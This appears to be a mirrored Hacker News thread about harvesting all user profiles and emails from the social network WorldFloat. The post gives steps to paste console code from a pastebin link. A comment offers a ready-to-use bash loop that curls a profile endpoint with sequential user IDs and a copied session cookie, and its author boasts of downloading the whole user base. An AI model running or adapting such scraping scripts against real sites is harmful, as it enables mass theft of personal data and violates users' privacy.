TE
科技回声
首页24小时热榜最新最佳问答展示工作
GitHubTwitter
首页

科技回声

基于 Next.js 构建的科技新闻平台,提供全球科技新闻和讨论内容。

GitHubTwitter

首页

首页最新最佳问答展示工作

资源链接

HackerNews API原版 HackerNewsNext.js

© 2025 科技回声. 版权所有。

Scrap all user data (with emails) from worldfloat (3m users)

1 点作者 motyard大约 12 年前
Whats WorldFloat?<p>Indian's WorldFloat ready to take on Facebook [http://articles.timesofindia.indiatimes.com/2013-05-11/social-media/39185564_1_7-million-users-facebook-user-idea]<p>How to scrap email and other data from worldfloat?<p>1) Open worldfload and login 2) Open javascript console(in chrome press ctrl+shift+j) 3) paste the following code and enter<p>http://pastebin.com/iGfHTRWf<p>by Sunny Luthra [KalaMartStore]

2 条评论

adilshaikh大约 12 年前
Did some hackin of my own &#38; downloaded the entire user details. Almost all of these are fake users with majority of the users having a gmail address with some random numbers.. something like xyz222@gmail.com...<p>here's the bash script I wrote, feel free to use :P<p>#!/bin/bash<p>clear<p>for count in {1..10000}. do<p>curl "<a href="http://worldfloat.com/AjaxControl/AJAXRequestHandler.aspx?ACTION=profiles&#38;User=$count" rel="nofollow">http://worldfloat.com/AjaxControl/AJAXRequestHandler.aspx?AC...</a> -H "Accept-Charset: ISO-8859-1, utf-8;q=0.7,<i>;q=0.3" -H "Accept-Encoding: gzip, deflate, sdch" -H "Host: worldfloat.com" -H "Accept-Language: en-US, en;q=0.8" -H "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31" -H "Accept: </i>/*" -H "Referer: <a href="http://worldfloat.com/float.aspx" rel="nofollow">http://worldfloat.com/float.aspx</a> -H "Cookie: ASP.NET_SessionId=aqyrjy455jhgegy4pf2jjsza; __utma=75150868.1043408261.1369317545.1369317545.1369317545.1; __utmb=75150868.9.10.1369317545; __utmc=75150868; __utmz=75150868.1369317545.1.1.utmcsr=nextbigwhat.com|utmccn=(referral)|utmcmd=referral|utmcct=/indias-zuckerberg-wordfloat-busted-297/; __asc=4cf55f8513ed1af94822591db23; __auc=4cf55f8513ed1af94822591db23; __unam=3e2676f-13ed1b17520-389700fe-3" -H "Connection: keep-alive" &#62; $count.txt.<p>done<p>echo "command completed successfully".
motyard大约 12 年前
Clickable links<p><a href="http://articles.timesofindia.indiatimes.com/2013-05-11/social-media/39185564_1_7-million-users-facebook-user-idea" rel="nofollow">http://articles.timesofindia.indiatimes.com/2013-05-11/socia...</a><p><a href="http://pastebin.com/iGfHTRWf" rel="nofollow">http://pastebin.com/iGfHTRWf</a>